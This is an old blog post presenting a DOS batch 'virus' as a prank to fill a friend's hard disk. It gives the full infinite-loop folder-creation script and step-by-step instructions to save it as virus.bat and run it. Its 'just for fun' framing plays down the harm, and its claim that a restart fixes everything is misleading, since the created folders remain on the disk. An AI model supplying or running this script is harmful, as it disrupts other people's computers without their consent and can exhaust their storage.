Tuesday, November 8, 2011

Dos batch file Virus to fill entire hard disk

You want to do fun with your friends computer? This simple code will make your friend computer completely full. His/Her root directory will be filled with unnecessary folders. And finally entire drive will be filled. He can not do any work on it. Make fun but never use for destruction of other computers. Have fun


@ECHO off
CD %HomeDrive%\
SET vrs=1
GOTO loop
:loop
MKDIR ILOVEU%vrs%
SET /a vrs=%vrs%+1
GOTO loop


How to make this
1.Open Notepad. Then type the code.
2. Save it by the extension called .bat. e.g “virus.bat”.
3. Then just double click it. Your system will halt. Just restart the system, it will work fine. Have fun.

0 comments:

Post a Comment

You are most welcome for making comments here. I will consider your view and will reply you soon.